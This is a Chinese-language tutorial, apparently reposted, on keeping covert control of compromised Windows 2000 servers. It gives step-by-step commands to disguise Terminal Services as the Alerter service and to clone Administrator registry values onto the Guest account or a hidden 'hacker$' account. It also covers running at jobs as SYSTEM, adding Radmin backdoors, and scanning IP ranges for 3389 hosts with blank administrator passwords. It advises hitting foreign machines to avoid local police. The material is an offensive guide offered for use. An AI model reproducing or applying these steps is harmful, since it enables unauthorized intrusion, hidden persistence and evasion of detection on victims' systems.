第十一行的"DisplayName"="(这里是服务名称..改为您所换的服务名称..这里改为Alerter)
保存..再导入注册表(这里要先运行Services.msc(可在CMD下打这命令)服务管理器..把Alerter的服务先停止)
再在CMD下
CD c://winnt//system32
copy termsrv.exe service.exe(这里是复制termsrv.exe为Alerter服务文档名差不多的文档)
CD C://winnt
sc ////127.0.0.1 config Alerter binpath= c://winnt//system32//service.exe(这里是从新定向Alerter服务文档.服务名一定要区分大小写A要大写)
九.注消后(注消比直接关要好些)..用Radmin重启肉鸡..
十.使用被禁用的帐户[Guest]登陆.删除自己开始建的帐号
1.使用psu.exe展开注册表到
HKEY_LOCAL_MACHINE//SAM//SAM//Domains//Account//Users
用法:[psu -p regedit -i pid]
Pid 的值为在任务栏空白处点右键-->>任务管理器--->>进程中的winlogon.exe后面的数值就是PID数值
如:psu –p regedit –i 157
将Guest克成管理员权限
克成管理员权限的方法:
找到HKEY_LOCAL_MACHINE//SAM//SAM//Domains//Account//Users//Names//Administrator的类型值.
在HKEY_LOCAL_MACHINE//SAM//SAM//Domains//Account//Users//下找到这个类型值在复制数值名为F的数值数剧覆盖相应的Guest的类型值(找的方法相同)
导出Guest的配置(也就是导出HKEY_LOCAL_MACHINE//SAM//SAM//Domains//Account//Users//Guest和他相应的类型值的数据) 然后删除Guest的配置
2.查看电脑管理中帐户列表 刷新这时候会出现错误[很难找到帐户](跳过这步也行)
3.将Guest的配置(二个REG文档导进注册表)
4.修改Guest帐户密码,命令行下禁用Guest帐户[一定是命令行下]
net user Guest **** [修改密码]
net user Guest /active:yes
net user Guest /active:no[命令行下禁用Guest]
5.实验被禁止的帐户Guest是否可用.
6.用Guest登陆后删除自己建的帐号
net user mint /del
整个过程结束
最后最好把RADMIN的服务也改了..多留个后门多条路..呵呵
整个过程全部结束..这机子就真正变成您的肉鸡了...
文章里面的内容都是以下动画的内容(通过我自己的理解写的..也许存在许多错误..希望对和偶相同的菜鸟有帮助)
笑语☆嫣然的《终结3389》
mervin制作 <《终结3389》补充版>
孤狼望月 <使用被禁用的帐户[Guest]登陆>
(他更有个(隐藏帐号后门教程)也差不多)
碎片 <Radmin服务端最新配置方法>
最后送一个找固定IP肉鸡的方法:
菜菜鸟教程之-如何提高扫描到肉鸡的机会 BY:网络凡人
先找个有不正常端口的代理,代理我一般到网迷之家(www.52cyq.com)拿的。就这个好了
218.58.88.15:45576 [山东省 青岛市](我的是教育网,扫描不到外国的机的,所以用国内的IP来
做试范),我把他扩充了整一个网段。由218.58.88.1-218.58.88.255您能够扩充成218.58.80.1-
218.58.90.255 .端口为了减少动画的大小,就扫描3389好了,。IP扩充多少就要看您
的网快还是慢。快的就扩充多点,慢的只扫描一个c段IP好了。看到没有,[218.58.88.8]:
发现 NT-Server弱口令: Administrator/[空口令]就是这么简单就能够扫描到肉鸡的,记得,
我这里出不了外国,才扫描国内的机。您们扫描外国的机,不要扫描国内的机啊~
假如发生了什么事,公安会找您的哦。好了。扫描就说到这了。
、假设我们是以终极用户administrator登录到开有终端服务的肉鸡上的,首先在命令行下或帐户管理器中建立一个帐户:hacker$,这里我在命令行下建立这个帐户
net user hacker$Content$nbsp;1234 /add
2、在开始/运行中输入:regedt32.exe并回车来运行regedt32.exe。
3、点“权限”以后会弹出窗口
点添加将我登录时的帐户添加到安全栏内,这里我是以administrator的身份登录的,所以我就将administrator加入,并配置权限为“完全控制"。这里需要说明一下:最好是添加您登录的帐户或帐户所在的组,切莫修改原有的帐户或组,否则将会带来一系列不必要的问题。等隐藏终极用户建好以,再来这里将您添加的帐户删除即可。
4、再点“开始”→“运行”并输入"regedit.exe" 回车,启动注册表编辑器regedit.exe。
打开键:HKEY_LOCAL_MAICHINE//SAM//SAM//Domains//account//user//names//hacker$"
5、将项hacker$、00000409、000001F4导出为hacker.reg、409.reg、1f4.reg,用记事本分别打这几个导出的文档进行编辑,将终极用户对应的项000001F4下的键"F"的值复制,并覆盖hacker$对应的项00000409下的键"F"的值,然后再将00000409.reg和hacker.reg合并。
6、在命令行下执行net user hacker$Content$nbsp;/del将用户hacker$删除:net user hacker$Content$nbsp;/del
7、在regedit.exe的窗口内按F5刷新,然后打文档-导入注册表文档将修改好的hacker.reg导入注册表即可
8、到此,隐藏的终极用户hacker$已建好了,然后关闭regedit.exe。在regedt32.exe窗口内把HKEY_LOCAL_MACHINE//SAM//SAM键权限改回原来的样子(只要删除添加的帐户administrator即可)。
9、注意:隐藏的终极用户建好后,在帐户管理器看不到hacker$这个用户,在命令行用“net user”命令也看不到,但是终极用户建立以后,就不能再改密码了,假如用net user命令来改hacker$的密码的话,那么在帐户管理器中将又会看这个隐藏的终极用户了,而且不能删除。
如何在命令行下远程建立隐藏的终极用户
在这里将用at的命令,因为用at产生的计划任务是以系统身份运行的,所以也用不到psu.exe程式。为了能够使用at命令,肉鸡必须开有schedule的服务,假如没有开启,可用流光里带的工具netsvc.exe或sc.exe来远程启动,当然其方法也能够,只要能启动schedule服务就行。
对于命令行方式,您能够采用各种连接方式,如用SQLexec连接MSSQL的1433端口,也能够用telnet服务,只要以您能得到一个cmdshell,并且有运行at命令的权限就能够。
文章整理:西部数码--专业提供域名注册、虚拟主机服务
http://www.west263.com
以上信息与文章正文是不可分割的一部分,如果您要转载本文章,请保留以上信息,谢谢!
